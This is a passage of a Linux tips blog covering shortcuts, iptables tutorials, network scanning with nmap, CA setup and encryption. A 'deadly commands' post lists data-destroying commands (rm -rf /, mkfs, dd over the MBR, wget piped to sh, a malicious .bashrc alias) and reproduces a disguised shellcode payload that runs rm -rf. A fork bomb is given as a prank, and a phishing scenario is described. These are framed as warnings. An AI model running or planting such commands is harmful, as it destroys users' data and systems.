[ctrl][alt][l] Lock the desktop.
[ctrl][alt][d] Toggle hide/show the desktop (great to hide the Solitaire game when your boss walks in).

2. 'xkill' Command : Kills on X-windows the process that we select by clicking it with the mouse. It's the same as kill but on graphical mode. Hotkey: Ctrl+Alt+ESC.

3. 'at' Command : Scheduling processes or tasks to be run at a particular time.
Examples:
Sets the computer to play the cd at 7:00.
$at 7:00 cdplayd
List the automatic programmed jobs.
$time atq
Delete automatic job number 8.
$time atrm 8

4. rdate : Synchronize system date & time.
Shows the server date and time.
$rdate -p ntp.nasa.gov
Synchronizes your time and date with the server.
$time rdate -s ntp.nasa.gov

Linux Amazing Keypresses & Commands : Set 1

2010-07-14T12:08:00.002+05:30

If you want to make your Linux working experience more comfortable & faster, then go through these commands.
1. Linux commands on the console may often span many lines, and encountering a type mistake at the beginning of the command would require you to use the slow way of punching the right/left arrow keys to traverse in the command string.
Remedy : Try Ctrl+e to move to the end of the command string and Ctrl+a to reach start. It’s the fastest way to edit a Linux command line. To delete a word in the command string, use Ctrl+w.

2. Another wonder of a simple shell variable is !$. Let’s say you have to create a directory, go into it and then rename it. So the flow of commands would be:

Code:

$ mkdir your_dir
$ mv your_dir my_dir
$ cd my_dir

Remedy: Well, Linux has a shorter and quicker way:

Code:

$ mkdir your_dir
$ mv !$ my_dir
$ cd !$

!$ points to the last string in the command string.

3. Run the following code to get to know the basic block of any Linux command & what it does internally:

Code:

$ strace -c /usr/bin/ls

strace is a system call monitor command and provides information about system calls made by an application, including the call arguments and return value.

4. For creating a chain of directories and sub-directories, something like /tmp/our/your/mine?
Remedy: Try this:

Code:

$ mkdir -p /tmp/our/your/mine

5. One very interesting way to combine some related commands is with && or ; .

Code:

$ cd dir_name && ls -alr && cd ..

Enhance Linux Box Security: Iptables made easy - tutorial part 4

2010-06-27T21:22:00.005+05:30

This time we are concern with mangle rules of iptables.
Mangling of packets is done only with NAT and is a part of the NAT process. In NAT, we can "mangle" a packet as modifying the Source IP address and Destination IP address fields of the IP header.
Format of IP PACKET

Using the mangle table of iptables we can modify the following three fields:
• Set a mark to IP packets
• TOS: the 8 bit Type Of Service field
• TTL: the 8 bit Time to live field
iptables can set a mark to IP packets that can be used internal by iproute2 for source routing and/or QoS. This internal mark, called nfmark (netfilter mark), doesn't alter any of the IP packet headers' fields. Nfmarks can be set using the MARK target in iptables, which has three options.
MARK target options:
--set-mark value Set nfmark value
--and-mark value Binary AND the nfmark with value
--or-mark value Binary OR the nfmark with value
##mark packets to 192.168.1.100 with nfmark 6:

Rule 1:

# iptables -t mangle -A POSTROUTING -d 192.168.1.100 -j MARK --set-mark 6

The TOS field is 8 bits long. Alteration of the TOS field is very useful for QoS. For this, iptables uses TOS target that has the --set-tos option.
TOS target options:
--set-tos value Set Type of Service field to one of the
following numeric or descriptive values:
Minimize-Delay 16 (0x10)
Maximize-Throughput 8 (0x08)
Maximize-Reliability 4 (0x04)
Minimize-Cost 2 (0x02)
Normal-Service 0 (0x00)
## set TOS to Maximize-Throughput for outgoing FTP data:

Rule 2:

# iptables -t mangle -A POSTROUTING -p tcp --sport 20 -j TOS --set-tos 8

The TTL field of the IP packet header is the Time To Live for that IP packet, and can be altered using the TTL target of iptables.
TTL target options
--ttl-set value Set TTL to
--ttl-dec value Decrement TTL by
--ttl-inc value Increment TTL by
Altering TTL can be useful, for example, if you want a client not to distribute Internet to others. If you set the TTL value to 1 for packets going to a certain IP address, then only the device having that IP address receives IP packets. If the packet is destined to a host behind that IP address, the TTL will be decremented and the IP packet will be dropped.
## set TTL to 1 for packets going out interface ppp0:

Rule 3:

# iptables -t mangle -I POSTROUTING -o ppp0 -j TTL --ttl-set 1

Enhance Linux Box Security: Iptables made easy - tutorial part 3.2

2010-06-27T15:46:00.004+05:30

We were left with Destination Network Address Translation part of the NAT rules of the iptables.

DNAT Destination NAT, deals with Prerouting & used to rewrite the Destination IP address of a packet. It's used for appending the destination IP for the packets meant for our internal LAN machines. When the packet reaches our external public IP, its destination address is DNATed & the packet is transferred to the local internal LAN machine. DNAT can only be used with prerouting & output chain. It is meant for all input packets/interface therefore '-i'. Destination NAT is specified using `-j DNAT', and the `--to-destination' option specifies an IP address, a range of IP addresses, and an optional port or range of ports (for UDP and TCP protocols only).

## Change destination addresses to 10.0.0.5.

Rule 1:

# iptables -t nat -A PREROUTING -i eth0 -j DNAT --to 10.0.0.5

## Change destination addresses to 10.0.0.5-10.0.0.10.

Rule 2:

# iptables -t nat -A PREROUTING -i eth0 -j DNAT --to 10.0.0.5-10.0.0.10

## Change destination addresses of web traffic to 10.0.0.5, port 8080.

Rule 3:

# iptables -t nat -A PREROUTING -p tcp --dport 80 -i eth0 -j DNAT --to 10.0.0.5:8080

## Send all packets destined for IP address 15.45.23.67 to a range of LAN IP's, namely 192.168.0.1 through 10. Note, as described previously, that a single stream will always use the same host, and that each stream will randomly be given an IP address that it will always be Destined for, within that stream.

Rule 4:

# iptables -t nat -A PREROUTING -p tcp -d 15.45.23.67 --dport 80 -j DNAT --to-destination 192.168.0.1-192.168.0.10

## Same as above, diverting the packets to a port range of an IP.

Rule 5:

# iptables -t nat -A PREROUTING -p tcp -d 15.45.23.67 --dport 80 -j DNAT --to-destination 192.168.1.1:80-100

Redirection is specialized case of Destination NAT. it is a simple convenience which is exactly equivalent to doing DNAT to the address of the incoming interface.
Its highly used in configuring a proxy server for a LAN & in linux squid server is mostly used for configuring a proxy server, using default port 3128.
## Send incoming port-80 web traffic to our squid (transparent) proxy

Rule 6:

# iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128

Enhance Linux Box Security: Iptables made easy - tutorial part 3.1

2010-06-25T09:48:00.006+05:30

This time, we will deal with NAT rules of iptables. NAT means Network Address Translation.
It is of 2 types - SNAT & DNAT
SNAT means Source NAT, deals with Postrouting/Masquerading. The SNAT target means that this target will rewrite the Source IP address in the IP header of the packet. It's used for hiding the private IPs from the internet. Packets leaving from an internal LAN when reaches the public IP or the firewall (visible to internet) is SNATed & then transferred to the destination. It appears to the external internet as if our external public IP is the originator of the packet. Postrouting is used in case of static IPs whereas Masquerading is used in case of dynamic IPs

The `-o' option is used as it is an outgoing interface. `-j SNAT' specifies Source NAT and the `--to-source' option specifies an IP address, a range of IP addresses, and
an optional port or range of ports (for UDP and TCP protocols only).

Now go through some SNAT examples.
##Change source addresses to 10.0.0.5.

Rule 1:

# iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to-source 10.0.0.5

## Change source addresses to 10.0.0.5-10.0.0.10.

Rule 2:

#iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to-source 10.0.0.5-10.0.0.10

##Change source addresses to 10.0.0.5, ports 1-1023

Rule 3:

#iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 10.0.0.5:1-1023

Rule 4:

#iptables -A POSTROUTING -t nat -s 192.168.0.0/24 -o eth0 -j SNAT --to-source 10.0.0.1

map private source IP numbers 10.0.0.1 of interfaces on the internal LAN to one of my public static IP numbers.

Rule 5:

#iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 192.168.0.1-192.168.0.160:1024-32000

Note:All the source ports would be confined to the ports specified. This is only valid if -p tcp or -p udp was specified. iptables will always try to avoid making any port alterations if possible, but if two hosts try to use the same ports, iptables will map one of them to another port. If no port range is specified, then if they're needed, all source ports below 512 will be mapped to other ports below 512. Those between source ports 512 and 1023 will be mapped to ports below 1024. All other ports will be mapped to 1024 or above.

## Masquerade everything out eth0.

Rule 6:

#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Note:Above rule is used when firewall may has a dynamic IP number because it connects to the internet itself via DHCP which can't be predicted.Its also independent of how a host on the internal network is assigned its own internal IP number. The host could be assigned a static IP number onan internal nonpublic network (e.g. 10. or 192.168.) or it could be itself assigned a dynamic IP number from your own DHCP server running on the firewall, or it could even have a public static IP number(which is very unlikely).

Rule 7:

#iptables -t nat -A POSTROUTING -p TCP -j MASQUERADE --to-ports 1024-31000

"--to-ports" is optional field. Either you can specify a single port like --to-ports 1025 or you may specify a port range as --to-ports 1024-3000. This alters the default SNAT port-selection as described in the rule 5 section. The --to-ports option is only valid if the rule match section specifies the TCP or UDP protocols with the --protocol match.
In next post DNAT is discussed.

Enhance Linux Box Security: Iptables made easy - tutorial part 2

2010-04-30T19:47:00.002+05:30

This time, we will deal with filter rules of iptables. While using filter rules, we don't need to write filter as it default option in iptables.
We have three chains here input, output & forward.
Input chain checks those packets which are originate outside & meant for machine
Output chain checks those packets which originate from the machine & meant for outer systems
Forward chain checks those packets which are being routed from our machine.
The best way of implementing the iptables is to create a shell script & execute it.

Some basic examples of using filtering table are as follows:-

Rule 1:

#iptables -A INPUT -s 192.168.1.0/24 -j REJECT

Appends the input chain such that every input packet from given ip will be rejected.

Rule 2:

#iptables -A INPUT -s 192.168.0.20 -p icmp -j DROP

>Appends the Input chain such that every ping (icmp packet) request will be dropped without notifying the sender.

Rule 3:

#iptables -A INPUT -m mac --mac-source 12:23:56:89:34:qw -j ACCEPT

>Accepting the input packet from the given mac id

Rule 4:

#iptables -A OUTPUT -d www.yahoo.com -j REJECT

>Rejecting any packet going output destined for yahoo.com

Rule 5:

#iptables -A INPUT -p tcp --dport 22 -j ACCEPT

>Permit SSH

Rule 6:

#iptables -A INPUT -s x.x.x.x -p tcp --dport telnet -j DROP

>Reject telnet

Deleting & Replacing rules

Rule 7:

#iptables -D INPUT 4

>deleting rule 4

Rule 8:

#iptables -D INPUT -p tcp --dport telnet -j DROP

>deleting the give rule with the specified format.

Rule 9:

#iptables -R INPUT 4 -p tcp --dport telnet -j ACCEPT

replacing the rule 4 with the specified format.

Suppose, for example, that you have a router that connects the 192.168.1.0/24 network and the
10.100.100.0/24 network. Suppose further that this ﬁrewall’s eth0 interface con-
tains the internet-addressable IP address of 66.1.5.1/8.The following Ipchains
command issued on the router would enable both private-IP networks to com-
municate via the Internet:

Rule 10:

#iptables –A FORWARD –I eth0 –s 192.168.1.0/24 –j MASQUERADE
#iptables –A FORWARD –I eth0 –s 10.100.100.0/24 –j MASQUERADE

This particular conﬁguration actually exposes the network.Any remote host
would be able to use your masquerading ﬁrewall to access your host.The fol-
lowing additions to the FORWARD chain of the ﬁlter table ensures that your
masquerading router masquerades only for your internal network

Rule 11:

#iptables –A FORWARD –s 192.168.1.0/24 –j ACCEPT
#iptables –A FORWARD –d 192.168.1.0/24 –j ACCEPT
#iptables –A FORWARD –s 10.100.100.0/24 –j ACCEPT
#iptables –A FORWARD –d 10.100.100.0/24 –j ACCEPT
#iptables –A FORWARD –j DROP

Here's a cool video, that will teach you creating nice shell script for executing iptables rules & mostly deals with filter rules.

Enhance Linux Box Security: Iptables made easy - tutorial part 1

2010-04-17T11:27:00.003+05:30

We can enhance the security & lock down our system by implementing packet filtering using iptables.
packet filtering is defined as as the process of controlling network packets as they enter, move through & exit the network stack within the kernel.
In pre-2.4 Linux kernels, ipchains are used, in 2.4 & beyond, iptables are used which improved the scope & control network packet filtering. We can implement kernel level internet firewall on stateless & stateful packet filtering using iptables. It can be implemented in both IPv4 & IPv6. Its also used in NAT & masquerading for subneting purposes.

Iptables comes with all Ubuntu based distro & RedHat by default. Ubuntu 8.04 Comes with ufw - a program for managing the iptables firewall easily.

So, how to implement it.
The command associated with iptables have a basic structure.

Code:

#iptables -t tables [action] [direction] [packet pattern] -j [fate]

Table: filter (default)/nat/mangle

Actions (Actions taken on the iptable rules)
-A for appending new rules
-D for deleting rules
-L for listing all the rules
-F for flush (deleting) all the rules.

Packet Pattern: (indicates the origin of packet in the rules)
-s for Source IP address
-d for Destination IP address

Fate: (indicates the fate of packet after it matches with one of the rules)
Drop-packet is refused access to the system and nothing is sent back to the host that sent the packet
Accept-the packet skips the rest of the rule checks and is allowed to continue to its destination
Reject-the packet is dropped, but an error packet is sent to the packet's originator.
Queue-queue the packet to be passed to user-space
Explanation of table:
netfilter(iptables) has three built-in tables or rules lists.
filter — default table for filtering network packets.
nat — table used to alter packets that create a new connection.
mangle — table is used for specific types of packet alteration.

Each table has a group of built-in-chains (direction) which correspond to the action performed
The built-in chains for the filter table are as follows:
      INPUT — applies to packets received via a network interface
      OUTPUT — applies to packets sent out via the same network interface which received the packets.
      FORWARD — applies to packets received on one network interface and sent out on another.

The built-in chains for the nat table are as follows:
      PREROUTING — alters packets received via a network interface when they arrive.
      OUTPUT — alters locally-generated packets before they are routed via a network interface.
      POSTROUTING — alters packets before they are sent out via a network interface.

The built-in chains for the mangle table are as follows:
     PREROUTING — alters packets received via a network interface before they are routed.
      OUTPUT — alters locally-generated packets before they are routed via a network interface.

Some basic iptables commands.
Displaying rules:- #iptables -L
Saving iptables:- #iptables save
(file will be created at /etc/sysconfig/iptables (for RedHat))
Backup & restore iptables
#iptables-save > filemname
#iptables-restore < filename
Flush iptables (remove all rules):- #iptables -F
Listing iptables:- #iptables -L
#iptables -L -v
latter for greater details.
(for further specialization in these commands visit man pages for iptables or execute command #man iptables)
The tutorial is continued in the next post,

Nice iptables basics video from Youtube

Linux deadly commands.

2010-04-08T21:41:00.005+05:30

Here is a list of commands that can sabotage your pc & crashes it.

1) #rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.
Other variants :

Code:

rm -rf .
rm -rf *
rm -r .[^.]*

2) A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

3) #mkfs.ext3 /dev/sda
This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
Other variants.

Code:

mkfs
mkfs.ext3
mkfs.anything

4) #:(){:|:&};:
Infamous fork bomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
Further information at http://linux-techy.blogspot.com/2010/03/fork-bomb-fire-in-hole.html
In Perl

Code:

fork while fork

5) #any_command > /dev/sda
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6) #wget http://some_untrusted_source -O- | sh
Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you. Above command is same as

Code:

wget http://some_place/some_file
sh ./some_file

7) #mv /home/yourhomedirectory/* /dev/null
This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

8) #echo "alias ls='rm -rf /'" >> /home/personyoudontlike/.bashrc
Creating a alias of ls command which means complete destruction.

9) #cat /dev/zero > /var
it will write zeroes to /var or cat it to your favorite file to destroy.

10) #chmod 711 /
Locksdown & freezes your system.
Similar command #chmod 777 /

11) #dd if=/dev/zero of=/dev/hda bs=512 count=1
(/dev/hda is just an example of which device you are booting from---these days with most disks being SATA, it's probably /dev/sda)
Zeros out the MBR (master boot record) so you can no longer boot. You can of course zero out the entire drive by removing the "bs=512 count=1" directives.

References
http://ubuntuforums.org/announcement.php?a=54

Running Windows Applications in Linux

2010-03-28T23:40:00.009+05:30

Transitioning from Windows to Linux is often quite difficult for Linux beginners. There are plenty of solutions available in the market today which will provide you a platform to install a window software in Linux.
Wine in one of the them. Many Linux OS have already started providing wine by default like linux Mint, Kubuntu etc.

Wine is a compatibility layer for running Windows programs. It is a completely free alternative implementation of the Windows API consisting of 100% non-Microsoft code.

Before you get started, you may want to check and confirm that the Windows program you want to install is in fact supported by Wine. Visit the Wine Application Database for a list of all the programs known to work in Wine, and at what level (fully supported, needs some tweaking, etc).

There is another software called Crossover
which requires registration. Visit this site http://www.howtogeek.com/howto/linux/how-to-install-windows-applications-on-linux-using-crossover/ for further information

If you don't want any hassle of installing packages in linux like Wine & Crossover, I suggest these alternatives.

1> Search for open source alternatives. There are plenty of alternatives available in market like gimp instead of Photoshop, openoffice instead of Microsoft office, BriscCad instead of Autocad.
I feel like, you are not satisfied yet. Goto www.osalt.com.
On that site, you can enter the name of the Windows application and it will list the open source alternatives that provide similar functionality.

2> Run windows in a virtual machines. Some of the solutions available are VmWare & VirtualBox. Install windows inside linux & work in it.

Citrix

3> Run application in remote windows system. Ofcourse, this require extra resources. Most preferred application used are rdesktop & Citrix.

If you want it other way round i.e. running linux software in windows,
check this out -->http://hacks-tweaks-security.blogspot.com/2010/04/creating-linux-environment-installing.html

OS-Fingerprinting.

2010-03-20T18:20:00.002+05:30

No firewalls can block icmp packets since its the basic way of communication & talking with the alive hosts. Many tools in linux use this protocol for OS fingerprinting such as sing & hping2. First we need to know the alive hosts in a subnet.
>for i in {1..254}; do ping -c1 192.168.0.$i; done |grep "ttl"
This command will print all reply summary from alive hosts
In this command, I'm using shell programming to ping all hosts in my subnet 192.168.0.0/24 .
We can also use another application called fping.
install fping by executing command
>sudo apt-get install fping
    To query the network for alive hosts in the subnet 192.168.1.0/24 give the command.
>fping -g 192.168.1.0/24 | grep "alive"
            or
>fping -g 192.168.1.0 192.168.1.255 | grep "alive"

Now as we have found the alive ips we can continue to OS fingerprinting
Install sing by command > sudo apt-get install sing
For OS fingerprinting type sing -O ip_address

There is another well known tool called NMAP, its glamourised in movies like MATRIX & Swordfish. It has varied options for playing around with the packets being send.
>nmap -v -sP 172.17.191.0/24 |grep "up" // scanning a subnet for alive ips
>nmap -v -v -A 172.17.191.203            // scanning a pc
If this command don't works try "nmap -v -v -A -PN 172.17.191.203" forcing icmp packets.
Zenmap is another tool, which is GUI version of nmap. GFI languard is another famous tool.
Watch this video on OS fingerprinting using Zenmap

Further reading .
http://nmap.org/book/osdetect.html
http://nostromo.joeh.org/osf.pdf

Fork BomB -- FIRE IN THE HOLE!

2010-03-20T14:31:00.002+05:30

Here comes the fork bomb, it will explode & crash your system within minutes.

$ :(){ :|: & };:

It’s actually a shell function; :() denotes unnamed function with the body enclosed in {}. The statement ‘:|:’ makes a call to the function itself and pipes the output to another function call—which is the same function & puts all processes in the background and hence you can’t kill any process. Finally ‘;’ completes the function definition and the last ‘:’ initiates a call to this unnamed function. So it recursively creates processes and eventually your system will hang. This is one of the most dangerous Linux commands and may cause your computer to crash!

Solution : How to avoid a fork bomb? Of course, by limiting the process limit; you need to edit /etc/security/limits.conf. Edit the variable nproc to user_name hard nproc 100. You require root privileges to modify this file.

Above code is same as ->

forkbomb(){forkbomb|forkbomb&}; forkbomb

Check out this video from youtube about fork bomb prank.

Configuring Broadcom (bcm43xx) Wireless Adaptor in Linux!

2009-12-31T16:39:00.001+05:30

Configuring wireless adaptor in linux wasn't an easy job few years back, but now some of the linux distribution have started providing inbuilt drivers with OS like Kubuntu, Mint etc.
My laptop has broadcom wireless adaptor, which didn't responded to many of the linux distribution, until now when I came across Linux mint 7 (gloria). It detects my adaptor, by just choosing the STA proprietary wireless driver for it & works fine after that.
Recently, I have found some of the methods to configure the wireless adaptor in different linux distributions.

For OpenSUSE, a 1-click install YMP file (YaST Metapackage file) is available from Packman. To install this, go to http://packman.links2linux.org/ & search for broadcom-wl. Click on '1-click install' icon & follow the onscreen instructions.

To get it working on Mint 5, you can follow the instructions given at www.linuxmint.com/wiki/index.php/Broadcom_bcm43xx

.As for Fedora, its available in RPM fusion & for Mandriva, there is Mandriva non free repositories.

For CentOS, follow instructions(this methodology is obtained from http://kiranjith83.blogspot.com/):
Download wireless package from Broadcom
Untar the file hybrid-portsrc-x86_32_5_10_27_6.tar.gz (hybrid-portsrc-x86_64_5_10_27_6.tar.gz if you’re running on a 64-bit kernel) in its own folder:
>tar -xvzf hybrid-portsrc-x86_32_5_10_27_6.tar.gz
You should now see this in your directory listing:
hybrid-portsrc-x86_32_5_10_27_6.tar.gz
lib
Makefile
src

Add the following line to the file. Open file include/typedefs.h and add there the line below at header
#define TYPEDEF_BOOL

Without adding the header the compiling process exits with error
Now build the Loadable Kernel Module (LKM) like so:
>make -C /lib/modules/`uname -r`/build M=`pwd`

Of course, you need to make sure you have all the required kernel headers before building it. Once that’s done, your directory listing should look like this:
built-in.o
hybrid-portsrc-x86_32_5_10_27_6.tar.gz
lib
Makefile
modules.order
Module.symvers
src
wl.ko
wl.mod.c
wl.mod.o
wl.o

The magic file we need is wl.ko. Make sure you don’t have b43, b43legacy or b43xx loaded by running this:
>rmmod bcm43xx; rmmod b43; rmmod b43legacy

And for good measure remove ndiswrapper modules:
>rmmod ndiswrapper

Now load the module ieee80211_crypt_tkip:
>modprobe ieee80211_crypt_tkip

And finally load the wl.ko module:
>insmod wl.ko

Now if you do an ifconfig, you should see wlan0 right after your eth0 and lo devices.Test it out by scanning and connecting to a network. If it works, then you might want your module to load upon boot, which is something the Broadcom readme doesn’t touch on. Let me school you how.
Copy the wl.ko file to /lib/modules/2.6.26-1-686/kernel/net/wireless/
>cp wl.ko /lib/modules/2.6.26-1-686/kernel/net/wireless/

Create the module dependencies:
>depmod -a

Try loading your new module!:
>modprobe wl

If you get no error on modprobe, then it worked perfectly! Next you have to tell your system to load the module at startup. On my debian system, I do this by editing the file /etc/modprobe.conf to include the following:
>alias wlan0 wl

Now, reboot and you’ve got official Broadcom wifi.
If you Need to setup linux as router do as follows?
Enable the ipforwarding and add the masqurade to eth0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
***********************************************
Do reply & post me methods of doing it in other
linux OSs.

Secure Site's CA(Certificate Authority) Explained!

2009-12-21T19:52:00.002+05:30

When you browse through an email sites, bank sites or money transaction sites like paypal, gmail etc, you may have noticed a lock at the bottom right corner, when you hover over it, it displays a CA name to which that site is authenticated to.

CA means Certificate Authority. In case of gmail, it is thawte consulting Ltd. CAs are commercially available & they charge for their service. Some are free while government agencies & Universities manage their own CAs. You can build your own too.

The real question --> How the whole thing works?
Well, CA issues digital certificates & generates public - private key pair. Digital certificate contains public key & site owner's identity. The private key is kept secret with the CA. So, when you open up a secure https site, the CA is there to confirm its authenticity & it tells you that it is the actual server or spot you are looking for. Its an example of trusted 3rd party. Its like, you send a sms to your girlfriend & your girlfriend checks your signature to confirm that its from you, just a crude example.

***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***

So, how to create your own CA.
There are 2 steps in it -->
1. Generating a Certificate signing request
2. Creating a CA signed certificate

Going through the first step:

-> login as root
>su -i
password :

-> Setting default values for the certificate.
edit the file.
>vi /etc/pki/tls/openssl.cnf

Append some lines under "[CA_default]" in the file as given below.

[ CA_default ]

dir = /etc/pki/CA # Where everything is kept
certificate = $dir/my_ca.crt # The CA certificate
crl = $dir/my_ca.crl # The current CRL
private_key = $dir/private/my_ca.key # The private key

Similarly under [ req_distinguished_name ], Edit as per your specification.

[ req_distinguished_name ]

countryName_default = IN
stateOrProvinceName_default = Delhi
localityName_default = SouthEx
0.organizationName_default = Some_Company

-> Creating supporting directories
>cd /etc/pki/CA/
> mkdir certs newcerts crl

-> Create empty certificate index & create serial no. file for certificates
>touch /etc/pki/CA/index.txt
>echo 01 > /etc/pki/CA/serial

-> Generate private key.
>cd /etc/pki/CA
>umask 077 // (changing default mask value)
>openssl genrsa -out private/my_ca.key -des3 2048
my_ca.key is the name of key & 2048 is the length of key, rsa is the algo used.
After the command is executed, a pass phrase will be asked, like this one
__________________________________________________ _______________

Generating RSA private key, 2048 bit long modulus
.................................................. .........+++
....................................+++
e is 65537 (0x10001)
Enter pass phrase for private/my_ca.key:
Verifying - Enter pass phrase for private/my_ca.key:
__________________________________________________ _______________
Enter pass phrase twice.

Now going into the 2nd step:

-> Create self signed certificate.
>cd /etc/pki/CA
>openssl req -new -x509 -key private/my_ca.key -days 365 > my_ca.crt
After executing this command, it will prompt you for the pass phrase, you typed in the previous step & then you have to enter some general information related to the certificate. As you have changed some default values in the file /etc/pki/tls/openssl.cnf, you don't need to change those.
It appeared like this for me. In the above command 365 days is the expiry date of the certificate.
__________________________________________________ _______________
[root@localhost CA]# openssl req -new -x509 -key private/my_ca.key -days 365 > my_ca.crt
Enter pass phrase for private/my_ca.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [IN]:
State or Province Name (full name) [Delhi]:
Locality Name (eg, city) [SouthEx]:
Organization Name (eg, company) [Some_Company]:
Organizational Unit Name (eg, section) []:IT
Common Name (eg, your name or your server's hostname) []:VIK
Email Address []:vik@gmail.com
[root@localhost CA]#
__________________________________________________ _______________

Now CA certificate is ready. It should be made available to clients for download. We can use http (Apache) for this job.

-> install httpd & mod_ssl
>yum install httpd* OR >rpm -ivh httpd*
>yum install mod_ssl* OR >rpm -ivh mod_ssl*
Incase of redhat yum resolves dependencies automatically

-> restart http service & put it under chkconfig
>service httpd restart
>chkconfig --level 345 httpd on

-> If firewall is enabled, unblock the traffic through port 80 & 443, mostly the ports are open but just to make sure.
>iptables -A INPUT -p tcp --dport 80 -j ACCEPT
>iptables -A INPUT -p tcp --dport 443 -j ACCEPT
>service iptables save

-> Now, link it to your already configured apache server (& dns). Create a directory /var/www/html/certs/ & copy the self signed certificate there & make sure it is world readable with SElinux type "httpd_sys_content_t". Issue the following commands.
>chmod -R 555 /var/www/html/certs/
>cp /etc/pki/CA/my_ca.crt /var/www/html/certs/
>chcon -t httpd_sys_content_t /var/www/html/certs/

/var/www/html/www.example.com/html/ is your document root of the site & www.example.com is your server name.
Its done! If someone wants, I can write a simple tutorial on configuring apache + dns (with or without chroot & HTTP OR HTTPS).

Now after all these steps, I assume your dns & apache are working properly (dig example.com returns ANSWER:NOERROR), try to browse your server, it will prompt for adding certificate that you created just now. Add the certificate to you browser.
Your browser has an inbuilt list of well known certificates that you can see.
>tools > option (or edit > preferences as per the version of firefox)
>advanced > encryptions > view certificates.

Sometimes when we try to access a random site, mozilla firefox alerts for adding exception.

Its because, your browser can't validate that site & its CA, you can browse that site after adding it as exception & taking the responsibilities of all threats.

***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***---***

Possible threats!
let me generate a situation, assume I run a cyber cafe and I created a fake site of paypal and linked it with a self signed certificate of my own, as I did above. And I added that certificate to the default browsers of all my pcs.
I configured it such that, when you enter the url - www.paypal.com, it directs you to my fake site signed with my own CA.
Ya, I know you don't remember the CA for the genuine paypal site & you are not aware enough to check the name of CA to make sure its genuine.--PERFECT!!
So, when you click login, it sends your username & password to my remote secret database file & the browser directs you to a fake connection timeout page. It makes you believe that there is some problem with the internet connection. After that, when you click try again or try refreshing the page, it will direct you to the actual paypal site. Ahh, the internet connection is back!! & someone succeeded in his bad game!

So, be sure to check the CA, when you access https sites through public computers. Atleast you can remember some CAs of email site that are important to you & bank sites that ask your credit/debit/ATM card credentials.

Check this out.. they are apparently implementing to some extent what I have discussed in this post
--> http://www.wired.com/threatlevel/2010/03/packet-forensics/

I hope it's quite informative.
Thanks for reading it!

Browser concerned in the Article : Mozilla Firefox
OS concerned in the Article : Redhat linux Server Enterprise Edition 5.2 (might work on other linux distribution)

sources of information :
http://en.wikipedia.org/wiki/Certificate_authority
Redhat Security Specialist Study books.

Linux Cryptography explained (Symmetric encryption & hashes).

2009-12-21T12:08:00.000+05:30

CRYPTOGRAPHY

It is the art of protecting information by transforming it (encrypting it) into an unreadable format, called cipher text. Only those who possess a secret key can decipher (or decrypt) the message into plain text. Encrypted messages can sometimes be broken by cryptanalysis, also called code breaking, although modern cryptography techniques are virtually unbreakable.

Symmetric Encryption:
Encryption algorithms that use the same key for encrypting and for decrypting information are called symmetric-key algorithms. The symmetric key is also called a secret key because it is kept as a shared secret between the sender and receiver of information. Otherwise, the confidentiality of the encrypted information is compromised.

Kerckhoff's principle (also called Kerckhoffs' assumption, axiom or law) was stated by Auguste Kerckhoffs in the 19th century: It states --
“a cryptosystem should be secure even if everything about the system, except the key, is public knowledge”.

Symmetric encryption is of two types:
1> Stream ciphers (encrypt the bits of the message one at a time)
2> Block ciphers (take a number of bits and encrypt them as a single unit)

Examples of Commands for encrypting & decrypting files in Linux:
>openssl enc -des3 -salt -a -in myfile.txt -out encryptedfile.des3
>openssl enc -d -des3 -salt -a -in encryptedfile.des3 -out myfile.txt
OR
>gpg -c --cipher-algo des3 myfile.txt
>gpg -d --cipher-algo des3 myfile.gpg

"openssl enc" & gpg r utilities for encryption.
des3 (block cipher) is an algorithm used for encryption. In place of it, aes (Advanced Encryption Standard algorithm approved by NIST in December 2001 uses 128-bit blocks), blowfish, twofish, CAST5 can be used for gpg. Similarly aes, blowfish, aes256,aes192, rc4 are for openssl enc.
a = armour – convert into ASCII (unicode character must be converted into ascii code before encryption)
salt = salt, to add uniqueness to same text(pc takes arbitrary salt value from the present state of cpu such as cursor position, RAM state etc)
Eg. If two person have the same password, their encrypted password will be different, credit goes to salt value. U can see ur password's salt value in /etc/shadow file. It is a part of the encrypted password text that is between $s, like $12Re.jfhrr343!k$
In gpg --ciper-algo is optional.

Cryptographic Hashes:

A "hash" (also called a "digest", and informally a "checksum") is a kind of "signature" for a stream of data that represents the contents.
A hash function takes a string (or 'message') of any length as input and produces a fixed length string as output, sometimes termed a message digest or a digital fingerprint.

To compute a message digest, issue the command:
